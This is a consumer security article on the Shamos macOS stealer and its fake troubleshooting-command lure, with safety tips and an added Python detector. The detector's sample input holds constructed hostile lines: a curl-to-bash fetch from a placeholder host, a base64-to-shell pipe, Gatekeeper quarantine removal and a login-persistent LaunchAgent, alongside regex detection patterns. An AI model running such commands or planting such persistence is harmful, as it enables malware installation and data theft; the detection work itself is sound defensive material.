A new malware campaign is making waves, specifically targeting Mac users across the globe. Security experts at CrowdStrike have identified a variant known as Shamos, which is part of the Atomic macOS Stealer (AMOS) family, created by a cybercriminal group dubbed COOKIE SPIDER. The method of attack employs ClickFix tactics, enticing victims who are seeking Mac troubleshooting assistance to visit counterfeit websites or GitHub repositories. These deceptive sites coax users into copying and pasting a seemingly harmless one-line command into Terminal, which, unbeknownst to them, downloads Shamos, evading macOS Gatekeeper protections and installing the malware.
Once embedded within the system, Shamos embarks on a quest for sensitive information, including Apple Notes, Keychain items, browser passwords, and even cryptocurrency wallets. The pilfered data is then compressed and dispatched directly to the attackers, often accompanied by additional malware such as botnet modules or counterfeit Ledger wallet applications.
How Shamos malware spreads on macOS
The distribution of these fraudulent “fixes” is facilitated through “malvertising” campaigns and imitation tech support sites with names like mac-safer[.]com or rescue-mac[.]com. These pages masquerade as reliable troubleshooting guides and appear prominently in search results for common Mac issues, such as “how to flush resolver cache.” Victims are encouraged to copy and paste commands that download malicious Bash scripts, which then capture the user’s password, disable file protections, and initiate Shamos. With the installation of persistence tools, the malware can even restart with the system, maintaining control long after the initial breach.
Tips to stay safe from Shamos malware
To protect yourself from Shamos and similar threats, consider these proactive measures:
1) Never run commands you don’t understand
While copy-pasting commands into Terminal may seem like a quick fix, it is also a common method for attackers to circumvent Apple’s built-in protections. If you encounter a command on a website, forum, or GitHub repository, refrain from executing it unless you fully comprehend its function. Instead, verify with Apple’s official support site or the Apple Community forums, where knowledgeable users and moderators can confirm safe troubleshooting methods.
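As an added illustration, not code from the article or from CrowdStrike, the Python script below puts tip 1 and the persistence point from the “How Shamos malware spreads” section into practice. It triages shell commands for the constructs the article describes (a remote script piped straight into a shell, an encoded payload decoded into a shell, removal of the quarantine attribute that Gatekeeper relies on, and a file dropped into or loaded from a launchd directory) and inspects a LaunchAgent property list for traits of script-dropped persistence. Every sample command, the example.invalid URL, the plist, and the pattern names are constructed for this example; the patterns are general indicators for this class of lure, not Shamos signatures.

```python
import os
import plistlib
import re

# General indicators for the "paste this one-liner into Terminal" lure.
# Constructed heuristics for illustration; they are not Shamos signatures.
RISK_PATTERNS = [
    ("remote script piped to shell", "high",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    ("remote content evaluated", "high",
     re.compile(r"\b(eval|source|(ba|z)?sh\s+-c)\s+[\"'$(]*\s*(curl|wget)\b")),
    ("encoded payload decoded into shell", "high",
     re.compile(r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("quarantine attribute removed (Gatekeeper bypass)", "high",
     re.compile(r"xattr(\s+-[a-z]+)*\s+-[a-z]*d[a-z]*\b[^|;&]*com\.apple\.quarantine")),
    ("file written into a launchd directory", "medium",
     re.compile(r"(\bcp\b|\bmv\b|\btee\b|>|-o\s)[^;&]*Library/Launch(Agents|Daemons)/")),
    ("launchd job loaded", "medium",
     re.compile(r"\blaunchctl\s+(load|bootstrap)\b")),
]
SEVERITY_RANK = {"none": 0, "medium": 1, "high": 2}


def flag_command(cmd: str) -> list[str]:
    """Return the names of every risk pattern that one shell line triggers."""
    return [name for name, _sev, rx in RISK_PATTERNS if rx.search(cmd)]


def risk_level(cmd: str) -> str:
    """Collapse the matched patterns into 'none', 'medium' or 'high'."""
    level = "none"
    for _name, sev, rx in RISK_PATTERNS:
        if rx.search(cmd) and SEVERITY_RANK[sev] > SEVERITY_RANK[level]:
            level = sev
    return level


def scan_history(lines: list[str]) -> list[tuple[str, str, list[str]]]:
    """Triage shell-history lines; returns (line, level, flags) for hits only."""
    hits = []
    for line in lines:
        flags = flag_command(line)
        if flags:
            hits.append((line, risk_level(line), flags))
    return hits


# Locations a hand-written installer script tends to drop into; constructed list.
SUSPICIOUS_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3"}


def launch_agent_findings(plist_bytes: bytes) -> list[str]:
    """Inspect a launchd property list for traits typical of dropped persistence."""
    job = plistlib.loads(plist_bytes)
    args = job.get("ProgramArguments") or []
    program = job.get("Program") or (args[0] if args else "")
    findings = []
    if job.get("RunAtLoad"):
        findings.append("RunAtLoad is set: the job starts at every login")
    if job.get("KeepAlive"):
        findings.append("KeepAlive is set: launchd restarts the job if it exits")
    if program.startswith(SUSPICIOUS_DIRS) or re.search(r"/\.[^./]", program):
        findings.append(f"program lives in a temp or hidden path: {program}")
    if os.path.basename(program) in INTERPRETERS:
        findings.append(f"program is an interpreter ({program}); inspect its arguments")
    for flag in flag_command(" ".join(args)):
        findings.append(f"arguments contain: {flag}")
    return findings


# Constructed sample input: two legitimate lines (a real resolver-cache flush),
# four lines shaped like the lure, and one harmless directory listing.
SAMPLE_HISTORY = [
    "scutil --dns",
    "sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder",
    'curl -fsSL "https://example.invalid/fix.sh" | bash',
    "echo aGVsbG8= | base64 -d | sh",
    "xattr -r -d com.apple.quarantine /Applications/Fix.app",
    "launchctl load ~/Library/LaunchAgents/com.example.helper.plist",
    "ls -la ~/Library/LaunchAgents",
]

# Constructed LaunchAgent: an interpreter that re-fetches a remote script at login.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -fsSL https://example.invalid/update | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for line, level, flags in scan_history(SAMPLE_HISTORY):
        print(f"[{level}] {line}\n    {', '.join(flags)}")
    print("LaunchAgent findings:")
    for finding in launch_agent_findings(SAMPLE_PLIST):
        print("  -", finding)
```

Run on a real machine, the history scanner can be pointed at ~/.zsh_history and the plist inspector at each file under ~/Library/LaunchAgents; the legitimate resolver-cache flush in the sample produces no flags, which is the point of keeping the patterns narrow rather than matching on sudo alone.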
2) Avoid sponsored results
Cybercriminals are aware that when your Mac encounters an issue, you will likely seek a swift solution. They exploit this urgency by purchasing sponsored ads that elevate fake troubleshooting websites in search results. Clicking on the top link may seem intuitive, but it could lead to a trap. Rely on trusted sources like Apple Support, or scroll past the ads to locate legitimate guides.
3) Be wary of GitHub projects
While GitHub serves as an invaluable resource for developers, it has also become a breeding ground for malicious repositories that imitate legitimate software. Attackers frequently clone popular applications or tools, embedding malware within. Before downloading anything, scrutinize the publisher’s name, stars, and activity history. If the account appears suspicious, inactive, or newly created, exercise caution and avoid it.
4) Use strong antivirus protection
As Mac malware evolves rapidly, relying solely on Apple’s built-in security features may not suffice. A robust antivirus solution provides an additional layer of defense by scanning downloads, blocking malicious scripts, and detecting suspicious behavior in real time. Some security tools can even identify the one-line Terminal commands employed by Shamos before they inflict damage.
5) Use a personal data removal service
Given that Shamos is engineered to steal personal information and relay it to cybercriminals, minimizing your online footprint can help mitigate potential fallout. A personal data removal service scans data broker sites and eliminates your exposed information, making it more challenging for attackers to resell or exploit it following a breach. While this won’t prevent malware from stealing what’s on your Mac, it adds another layer of protection by reducing the data available for criminals to exploit.
6) Keep macOS updated
Apple routinely patches vulnerabilities in macOS that malware attempts to exploit. By ensuring your system is up to date, you effectively close the doors that attackers rely on. Enable automatic updates so your Mac receives the latest patches as soon as they are available. Coupling this with good digital hygiene, such as avoiding dubious downloads, significantly lowers your risk of infection.
Kurt’s key takeaways
Cybercriminals are acutely aware that when your Mac malfunctions, you will seek immediate solutions. Shamos capitalizes on this urgency by masquerading as assistance. Staying safe requires a deliberate pause before you copy, paste, or download anything. If something seems amiss, it likely is.